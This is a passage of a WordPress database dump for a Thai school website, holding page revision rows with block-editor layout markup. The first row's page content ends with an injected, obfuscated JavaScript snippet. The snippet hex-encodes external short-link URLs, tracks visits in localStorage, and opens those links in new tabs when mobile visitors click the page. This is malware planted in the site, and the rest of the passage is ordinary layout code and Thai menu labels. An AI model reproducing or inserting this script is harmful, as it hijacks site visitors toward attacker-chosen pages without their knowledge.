_0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 12:19:19','2024-07-27 05:19:19','',14,'http://pakhaeng.ssk.in.th/?p=149',0,'revision','',0),
(150,1,'2024-07-27 12:20:07','2024-07-27 05:20:07','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/headline {\"uniqueId\":\"0ec6139a\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"22px\"}} -->\n<h2 class=\"gb-headline gb-headline-0ec6139a gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/grid {\"uniqueId\":\"19bd4464\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"2cef18b9\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":138} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/448905004_973201524597519_7994539186753533290_n-1.jpg\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุนทนภู่.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"66a01ab5\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":142} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/Untitled.png\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุขาดี.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" 